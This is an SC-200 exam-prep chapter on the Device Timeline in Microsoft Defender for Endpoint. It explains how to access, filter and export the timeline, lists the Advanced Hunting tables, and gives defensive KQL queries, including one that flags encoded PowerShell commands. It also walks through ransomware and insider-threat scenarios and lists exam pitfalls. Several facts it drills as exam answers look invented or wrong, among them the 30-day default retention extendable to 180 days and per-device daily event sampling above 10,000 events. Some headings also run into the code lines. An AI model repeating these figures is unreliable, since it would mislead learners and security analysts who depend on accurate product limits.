This chapter covers Device Timeline Analysis in Microsoft Defender for Endpoint (MDE), a critical skill for the SC-200 exam. Device Timeline allows security analysts to investigate historical events on a device, reconstructing the sequence of actions that led to an incident. Approximately 10-15% of exam questions touch on device investigation, including timeline usage, event types, and integration with Advanced Hunting. Mastering this topic is essential for passing the SC-200 and for real-world threat hunting and incident response.
Jump to a section
Think of the Device Timeline in Microsoft Defender for Endpoint (MDE) as the black box flight recorder on an aircraft. Just as a flight recorder continuously captures every sensor reading, pilot input, and system event during a flight, the Device Timeline records every process creation, file modification, network connection, registry change, and scheduled task event on a Windows device. When an incident occurs—like a security breach—the timeline allows investigators to replay the exact sequence of events leading up to and following the compromise. Each event is timestamped with millisecond precision and linked to the parent process, just as a flight recorder links each action to the pilot or system component. The timeline is not a live stream but a historical archive that can be queried using Advanced Hunting in the Microsoft 365 Defender portal. Analysts can filter by event type, user, process, or file hash to reconstruct an attacker's kill chain. Without this timeline, investigating an incident would be like trying to determine the cause of a plane crash without the flight recorder—relying on guesswork and incomplete data.
What is the Device Timeline?
The Device Timeline is a feature in Microsoft Defender for Endpoint that provides a chronological view of events that have occurred on a specific device. It is accessible from the Microsoft 365 Defender portal (security.microsoft.com) by navigating to Assets > Devices, selecting a device, and then clicking the 'Timeline' tab. The timeline displays events such as process creations, file modifications, network connections, registry changes, scheduled task creations, and alert triggers. Each event includes a timestamp, the action taken, the file or process involved, and the parent process that initiated it. This allows analysts to trace the origin of malicious activity and understand the full scope of an attack.
How the Timeline Is Populated
The timeline is built from telemetry collected by the Microsoft Defender for Endpoint sensor installed on each Windows device. The sensor captures events at the kernel level using Event Tracing for Windows (ETW) and other OS mechanisms. Events are normalized and sent to the cloud, where they are stored in the Microsoft 365 Defender backend. The retention period for timeline events is 30 days by default, but it can be extended up to 180 days with additional licensing (e.g., Microsoft 365 E5). The timeline is updated in near real-time, usually within 2-5 minutes of an event occurring on the device.
Key Components of the Timeline
Timestamp: The exact date and time (UTC) when the event occurred, down to milliseconds.
Action: The type of event, such as 'Process created', 'File modified', 'Network connection', 'Registry value set', 'Scheduled task created', etc.
File/Process: The name and full path of the file or process involved. For processes, the command line is also shown.
Parent process: The process that initiated the event, with its PID and command line. This is crucial for understanding process ancestry.
User: The account under which the event ran (e.g., DOMAIN\user).
Device: The device name and ID.
SHA256 hash: The cryptographic hash of the file, useful for threat intelligence lookups.
Alert ID: If the event triggered an alert, the corresponding alert ID is linked.
How to Use the Timeline for Investigation
To investigate an incident, analysts typically start from an alert. Clicking the alert opens the incident page, which lists affected devices. From a device page, the timeline can be filtered by time range, event type, user, process, file hash, or specific keywords. For example, to find all PowerShell executions, filter Action: 'Process created' and File name: 'powershell.exe'. The timeline can be exported to CSV for offline analysis.
Advanced Hunting and the Timeline
The timeline data is also accessible via Advanced Hunting in the Microsoft 365 Defender portal. The relevant tables are:
DeviceProcessEvents: Process creation events.
DeviceFileEvents: File creation, modification, deletion, and rename events.
DeviceNetworkEvents: Network connections.
DeviceRegistryEvents: Registry modifications.
DeviceEvents: Miscellaneous events (e.g., scheduled tasks, WMI activity).
These tables share the same schema and data as the timeline. Queries can be written in Kusto Query Language (KQL) to perform complex analysis. For example, to find all processes spawned by a suspicious parent:
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName == "malware.exe"
| project Timestamp, FileName, FilePath, InitiatingProcessCommandLineInteracting with Related Technologies
Microsoft 365 Defender: The timeline is part of the unified security platform. Alerts from Microsoft Defender for Office 365, Defender for Cloud Apps, and Defender for Identity can link to device timelines.
Microsoft Sentinel: Timeline data can be streamed to Sentinel for long-term retention and correlation with other data sources.
Threat Intelligence: File hashes from the timeline can be used to query threat intelligence feeds for known malware.
Defaults and Limits
Retention: 30 days (configurable up to 180 days with E5).
Event volume: Up to 10,000 events per device per day are stored; events beyond this limit are sampled.
Time zone: All timestamps are in UTC; local time can be displayed in the portal.
Data types: Only events from supported Windows versions (Windows 10/11, Windows Server 2016+) are captured.
Step-by-Step Investigation Workflow
Identify the incident: Start from an alert or a suspicious device in the queue.
Narrow the time range: Set the timeline filter to the time of the alert ± 1 hour.
Filter by event type: Look for process creation, file writes, and network connections.
Examine process tree: Click on a process to see its parent and children.
Check file hashes: Look up suspicious file hashes in Threat Analytics.
Correlate with alerts: Note any alerts that appear in the timeline.
Export evidence: Export relevant events to CSV for reporting.
Common Pitfalls
Overlooking parent processes: Always check the parent process; many attacks use LOLBins (e.g., wscript.exe spawning cmd.exe).
Ignoring timestamps: Events may occur milliseconds apart; order matters.
Assuming all events are captured: Some events like kernel-mode rootkits may bypass the sensor.
Exam Relevance
The SC-200 exam expects candidates to know:
How to access the timeline from the device page.
The types of events available (process, file, network, registry, etc.).
How to filter and export timeline data.
The relationship between timeline and Advanced Hunting tables.
The default retention period (30 days) and how to extend it.
How to use the timeline to identify process ancestry.
Sample KQL Query for Timeline Analysis
To find suspicious PowerShell execution with encoded commands:
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "-EncodedCommand"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileNameAccess the Device Timeline
Log in to the Microsoft 365 Defender portal (security.microsoft.com) with appropriate permissions (Security Reader, Security Administrator, or custom role with device investigation). Navigate to Assets > Devices. Search for the device by name or IP address. Click on the device name to open its details page. Select the 'Timeline' tab. The timeline loads the last 30 days of events by default. You can adjust the time range using the date picker. The timeline is paginated; use the 'Load more' button to fetch additional events.
Filter Events by Type
Use the filter bar to narrow down events. Click 'Add filter' and select an event type such as 'Process created', 'File modified', 'Network connection', 'Registry value set', or 'Scheduled task created'. You can also filter by user (e.g., 'NT AUTHORITY\SYSTEM'), process name (e.g., 'cmd.exe'), or file hash (SHA256). Multiple filters can be combined using AND logic. The timeline updates instantly. For example, to see only PowerShell executions, set Action: 'Process created' and File name: 'powershell.exe'.
Examine Process Tree
Click on any event row to expand it. The expanded view shows the parent process and any child processes. For process creation events, the command line of the process and parent process is displayed. Use this to understand the process ancestry. For example, if you see a suspicious process like 'malware.exe' spawned by 'winword.exe', it indicates a macro-based attack. You can click on the parent process name to navigate to its event in the timeline, effectively tracing the attack chain backwards.
Correlate with Alerts
Events that triggered an alert have an 'Alert ID' field. Clicking the alert ID opens the alert details page. This allows you to see the full context of why the alert was generated. You can also see if multiple events are associated with the same alert. This helps in understanding the severity and scope of the incident. For example, a file creation event followed by a network connection might be part of a C2 communication.
Export Timeline Data
To export the timeline, click the 'Export' button at the top of the timeline. Choose CSV format. The export includes all currently displayed events (up to 10,000 rows). The CSV contains columns: Timestamp, DeviceName, Action, FileName, FolderPath, SHA256, ProcessName, ProcessId, ParentProcessName, ParentProcessId, UserName, RemoteIP, RemotePort, AlertId, and more. This data can be used for offline analysis, reporting, or integration with SIEM systems like Microsoft Sentinel.
Enterprise Scenario 1: Ransomware Investigation
A large enterprise detects a ransomware alert on a finance department workstation. The SOC analyst opens the device timeline and filters for the time range of the alert. They see a process creation event: a malicious executable dropped by a macro-enabled email attachment. The timeline shows the executable modifying hundreds of files (file modification events) and then deleting shadow copies (process creation: vssadmin.exe). The analyst traces back to the parent process: the macro launched from Microsoft Word (winword.exe). They also see a network connection to an external IP shortly before the encryption begins—likely command and control. The timeline helps them understand the full kill chain: initial access via phishing, persistence via registry run key, lateral movement via scheduled tasks, and finally ransomware execution. The analyst uses the SHA256 hash from the timeline to block the file across all endpoints.
Enterprise Scenario 2: Insider Threat Detection
A healthcare organization suspects an employee of exfiltrating patient data. The security team accesses the timeline for the employee's device. They filter by 'Network connection' events and see repeated connections to a cloud storage service (e.g., Dropbox) during off-hours. The timeline also shows 'File modified' events for sensitive database files just before the connections. The parent process is a custom script (launched from cmd.exe). The timeline reveals the script was created using Notepad (file creation event) by the same user. The team uses the timeline to establish a pattern of behavior and gather evidence for HR action.
Performance and Scale Considerations
In large organizations with thousands of devices, the timeline can generate significant telemetry. Microsoft recommends enabling event sampling only when necessary to reduce noise. The default 30-day retention is usually sufficient for investigations, but compliance requirements may necessitate longer retention using Advanced Hunting data export to Azure Log Analytics. When investigating, avoid loading the entire timeline for a device with high event volume; always use filters to limit the data. The portal may time out if querying a very large dataset; consider using Advanced Hunting with KQL for complex queries.
What SC-200 Tests on Device Timeline
The exam objective 'Analyze threat data' (domain 1.1) includes using the device timeline to investigate incidents. Specifically, you must know:
How to access the timeline from the device page.
The types of events captured (process, file, network, registry, scheduled tasks).
How to filter by event type, time range, user, process, and file hash.
How to interpret process ancestry (parent-child relationships).
The default retention period (30 days) and how to extend it (via Microsoft 365 E5 or add-on).
How to export timeline data to CSV.
The relationship between timeline events and Advanced Hunting tables (DeviceProcessEvents, DeviceFileEvents, etc.).
Common Wrong Answers and Why
'The timeline shows real-time events.' – Incorrect. The timeline has a delay of 2-5 minutes and is historical, not live.
'Timeline events are stored for 90 days by default.' – Incorrect. Default is 30 days; 90 days is a common distractor.
'You can modify timeline events.' – Incorrect. The timeline is read-only; you cannot edit or delete events.
'The timeline includes events from all Microsoft 365 workloads.' – Incorrect. It only includes events from the specific device's MDE sensor.
Specific Numbers and Terms
Retention: 30 days (default), up to 180 days with E5.
Delay: 2-5 minutes.
Maximum export rows: 10,000.
Event types: Process created, File modified, Network connection, Registry value set, Scheduled task created.
Parent process field is critical for tracing attack chains.
Edge Cases
Event sampling: If a device generates more than 10,000 events per day, some events are sampled (not stored). The exam may test that you understand that not all events are guaranteed.
Offline devices: If a device is offline, events are buffered locally and uploaded when the device reconnects. The timeline may show a gap.
Non-Windows devices: The timeline is only available for Windows devices; macOS and Linux have limited event logging.
How to Eliminate Wrong Answers
If an answer says 'real-time', eliminate it.
If an answer mentions editing events, eliminate it.
If an answer says 'all events are stored', eliminate it because of sampling.
Look for answers that mention '30 days' for retention.
The device timeline stores up to 30 days of historical events (default) from the MDE sensor.
Event types include process creation, file modification, network connection, registry change, and scheduled task creation.
Timeline events have a 2-5 minute delay; they are not real-time.
Filter by time range, event type, user, process, file hash, or alert ID.
Process ancestry (parent-child) is critical for tracing attack chains.
Export timeline data to CSV for offline analysis (max 10,000 rows).
Timeline data is also available via Advanced Hunting tables like DeviceProcessEvents.
Event sampling may occur if a device generates over 10,000 events per day.
These come up on the exam all the time. Here's how to tell them apart.
Device Timeline
Accessed from device page in M365 Defender portal.
Shows events for a single device only.
Limited to 10,000 events per export.
Filtering is done via dropdowns and text inputs.
Suitable for quick, device-centric investigations.
Advanced Hunting
Accessed via Hunting > Advanced Hunting in portal.
Can query across all devices and other data sources.
No export limit; can return millions of rows.
Queries are written in Kusto Query Language (KQL).
Suitable for complex cross-device threat hunting and correlation.
Mistake
The device timeline shows events in real time.
Correct
Events appear in the timeline with a 2-5 minute delay due to telemetry upload and processing. It is not a live stream.
Mistake
All events on a device are captured in the timeline.
Correct
If a device generates more than 10,000 events per day, some events are sampled and not stored. Not all events are guaranteed.
Mistake
The timeline can be used to modify or delete events.
Correct
The timeline is read-only. You cannot edit or delete events. It is for investigation only.
Mistake
The timeline includes events from all Microsoft 365 services.
Correct
The timeline only includes events from the Microsoft Defender for Endpoint sensor on that specific device. Events from Office 365, Cloud Apps, etc., are not included.
Mistake
The default retention period for timeline events is 90 days.
Correct
The default retention is 30 days. It can be extended to 180 days with Microsoft 365 E5 or an add-on license.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Go to security.microsoft.com, navigate to Assets > Devices, click on a device name, then select the 'Timeline' tab. You must have appropriate permissions (Security Reader or above).
The default retention is 30 days. You can extend it to 180 days with a Microsoft 365 E5 license or an add-on. The exam often tests this 30-day default.
No, the timeline is read-only. You cannot modify or delete events. It is designed for investigation and evidence collection only.
The timeline captures process creation, file modifications (create, modify, delete, rename), network connections, registry changes, and scheduled task creations. Other events like WMI activity may also appear under 'Miscellaneous'.
Click 'Add filter', set Action to 'Process created', and File name to 'powershell.exe'. You can also filter by command line using the 'Process command line' field if available.
The timeline is device-specific and provides a quick graphical view. Advanced Hunting allows KQL queries across all devices and data sources, offering more flexibility for complex investigations.
Click the 'Export' button at the top of the timeline. Choose CSV format. The export includes up to 10,000 rows of the currently displayed events.
You've just covered Device Timeline Analysis in MDE — now see how well it sticks with free SC-200 practice questions. Full explanations included, no account needed.
Done with this chapter?